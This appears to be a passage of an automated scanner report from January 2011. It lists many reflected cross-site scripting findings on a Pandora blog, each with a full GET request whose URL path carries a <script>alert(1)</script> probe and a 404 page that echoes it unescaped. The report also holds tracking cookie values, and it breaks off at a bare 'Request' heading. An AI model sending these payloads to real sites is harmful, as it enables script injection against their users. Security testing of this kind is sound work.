GET /pandora/archives/2010/0980718<script>alert(1)</script>b33c32116fb/tim-on-cnbc-1.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:43 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 367
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/0980718<script>alert(1)</script>b33c32116fb/tim-on-cnbc-1.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7f010<script>alert(1)</script>db22de039d1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/09/tim-on-cnbc-1.html7f010<script>alert(1)</script>db22de039d1 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 367
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/09/tim-on-cnbc-1.html7f010<script>alert(1)</script>db22de039d1 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6a980<script>alert(1)</script>ab4f3aefded was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora6a980<script>alert(1)</script>ab4f3aefded/archives/2010/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:23 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora6a980<script>alert(1)</script>ab4f3aefded/archives/2010/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f9630<script>alert(1)</script>c4b6b39b005 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesf9630<script>alert(1)</script>c4b6b39b005/2010/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesf9630<script>alert(1)</script>c4b6b39b005/2010/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 52dc5<script>alert(1)</script>f6f7326f783 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/201052dc5<script>alert(1)</script>f6f7326f783/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/201052dc5<script>alert(1)</script>f6f7326f783/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 46f70<script>alert(1)</script>135aca784e3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/1046f70<script>alert(1)</script>135aca784e3/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/1046f70<script>alert(1)</script>135aca784e3/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 639cf<script>alert(1)</script>9472b7ae95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora639cf<script>alert(1)</script>9472b7ae95/archives/2010/10/an-update-on-pa.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:39 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 368
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora639cf<script>alert(1)</script>9472b7ae95/archives/2010/10/an-update-on-pa.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6f725<script>alert(1)</script>f0ece6ca7d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives6f725<script>alert(1)</script>f0ece6ca7d6/2010/10/an-update-on-pa.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives6f725<script>alert(1)</script>f0ece6ca7d6/2010/10/an-update-on-pa.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4a6a1<script>alert(1)</script>e95f295a886 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20104a6a1<script>alert(1)</script>e95f295a886/10/an-update-on-pa.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:43 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20104a6a1<script>alert(1)</script>e95f295a886/10/an-update-on-pa.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 93473<script>alert(1)</script>78dc3d1265 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/1093473<script>alert(1)</script>78dc3d1265/an-update-on-pa.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 368
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/1093473<script>alert(1)</script>78dc3d1265/an-update-on-pa.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 57715<script>alert(1)</script>6156d1c3fc4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/10/an-update-on-pa.html57715<script>alert(1)</script>6156d1c3fc4 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:49 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/10/an-update-on-pa.html57715<script>alert(1)</script>6156d1c3fc4 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a04ff<script>alert(1)</script>1d9d8606f67 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraa04ff<script>alert(1)</script>1d9d8606f67/archives/2010/10/hoboken-town-ha.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraa04ff<script>alert(1)</script>1d9d8606f67/archives/2010/10/hoboken-town-ha.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6b806<script>alert(1)</script>2370e6bb9b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives6b806<script>alert(1)</script>2370e6bb9b0/2010/10/hoboken-town-ha.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 369 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives6b806<script>alert(1)</script>2370e6bb9b0/2010/10/hoboken-town-ha.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8496d<script>alert(1)</script>895ffd7f0fa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20108496d<script>alert(1)</script>895ffd7f0fa/10/hoboken-town-ha.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20108496d<script>alert(1)</script>895ffd7f0fa/10/hoboken-town-ha.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 297e2<script>alert(1)</script>6746ce0f566 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/10297e2<script>alert(1)</script>6746ce0f566/hoboken-town-ha.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:36 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/10297e2<script>alert(1)</script>6746ce0f566/hoboken-town-ha.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5a107<script>alert(1)</script>7d716b47026 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/10/hoboken-town-ha.html5a107<script>alert(1)</script>7d716b47026 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/10/hoboken-town-ha.html5a107<script>alert(1)</script>7d716b47026 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aeade<script>alert(1)</script>36a25f2db79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraaeade<script>alert(1)</script>36a25f2db79/archives/2010/10/pandora-one-gif.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:35 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraaeade<script>alert(1)</script>36a25f2db79/archives/2010/10/pandora-one-gif.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5f952<script>alert(1)</script>8da5452ad57 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5f952<script>alert(1)</script>8da5452ad57/2010/10/pandora-one-gif.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives5f952<script>alert(1)</script>8da5452ad57/2010/10/pandora-one-gif.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2f17b<script>alert(1)</script>64bc9a276f8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20102f17b<script>alert(1)</script>64bc9a276f8/10/pandora-one-gif.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:39 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20102f17b<script>alert(1)</script>64bc9a276f8/10/pandora-one-gif.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 976b9<script>alert(1)</script>41935888f21 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
